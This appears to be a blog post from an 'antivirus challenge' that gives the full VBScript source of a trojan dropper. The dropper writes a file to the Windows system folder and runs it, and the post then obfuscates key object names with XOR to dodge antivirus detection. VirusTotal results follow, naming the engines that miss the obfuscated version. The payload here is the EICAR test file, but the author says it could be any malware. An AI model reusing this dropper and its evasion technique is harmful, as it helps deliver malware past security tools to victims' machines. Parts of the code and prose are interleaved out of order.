 |
| Source:pixabay.com |
In this antivirus challange case, I will do some simple things by creating a VBS trojan dropper then I will apply string encryption to some particular strings. In this case I will encrypt "Scripting.FileSystemObject" and "WScript.Shell". Later I will compare the antivirus detection between original trojan and trojan with encrypted string.
Here's the trojan code:
t="58,35,4F,21,50,25,40,41,50,5B,34,5C,50,5A,58,35,34,28,50,5E,29,37,432,29,37,7D,24,45,49,43,41,52,2D,53,54,41,4E,44,41,52,44,2D,41,4E,54,49,56,49,52,55,53,2D,54,45,53,54,2D,46,49,4C,45"The trojan will drop eicar file and execute it. In reality, the dropped file can be any malware.
t=t&",21,24,48,2B,48,2A"
tmp = Split(t, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
pth = fso.getspecialfolder(0) & "\eicar.com"
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(b)
Next
Else
f.Write Chr(b)
End If
Next
f.Close
WScript.CreateObject("WScript.Shell").run(pth)
For the encryption function, I will use a simple xor algorithm.
Function CryptXor(sText)If the encryption has been applied then there are two line modified:
Dim I
Dim RetStr
Dim Charuse,CharPwd
For I = 1 to Len(sText)
charuse = Mid(sText,I,1)
charpwd = Mid("0",(I mod len("0"))+1,1)
retstr = retstr + chr(asc(charuse) xor asc(charpwd))
Next
CryptXor = retstr
End Function
Set fso = CreateObject(CryptXor ("cSBY@DY^W vY\UcICDU]RZUSD"))Now I will scan the original and the encrypted version. Here'are the results:
and
WScript.CreateObject(CryptXor("gcSBY@D cXU\\")).run(pth)
Original trojan: https://www.virustotal.com/#/file/70887a9f231d4289ccf96b6486393f0a43e5162c0e19a36b978c8b5bd6eec1f2/detection
Successful antivirus:
Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, ClamAV, DrWeb, Emsisoft, eScan, ESET-NOD32, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Yandex, Zillya, ZoneAlarmFailed antivirus:
AegisLab, AhnLab-V3, Antiy-AVL, Avast Mobile Security, Avira, Babable, Bkav, CAT-QuickHeal, CMC, Cyren, F-Prot, Fortinet, Ikarus, Jiangmin, K7AntiVirus, K7GW, Kingsoft, Malwarebytes, McAfee, McAfee-GW-Edition, Microsoft, Panda, Qihoo-360, Rising, Sophos AV, SUPERAntiSpyware, Symantec, TACHYON, Tencent, TheHacker, TrendMicro, TrendMicro-HouseCall, VBA32, VIPRE, ViRobot, Zoner, Alibaba, CrowdStrike Falcon, Cybereason, Cylance, eGambit, Endgame, Palo Alto Networks, SentinelOne, Sophos ML, Symantec Mobile Insight, Trustlook, WebrootEncrypted trojan: https://www.virustotal.com/#/file/a40b07d7fa2a7a11d5be19ac7f151cfe7dd65b2168fa4f0f6f24de848b89ff45/detection
Successful antivirus:
Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, Emsisoft, eScan, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Zillya, ZoneAlarmThere are four antivirus that become fail to detect the encrypted version:
ClamAV, DrWeb, ESET-NOD32, YandexAs you can see from the VirusTotal link, most of antivirus still detect the threat as eicar because the VBS trojan contain hex code of eicar file.
About the detection rate, I can say antivirus that don't detect the malware sample have bad malware script detection. ClamAV, DrWeb, ESET-NOD32, Yandex quite good but it is easy to bypass the detection.
Next time, I will encrypt the hex code of eicar file and let's see if this technique can bypass your antivirus protection.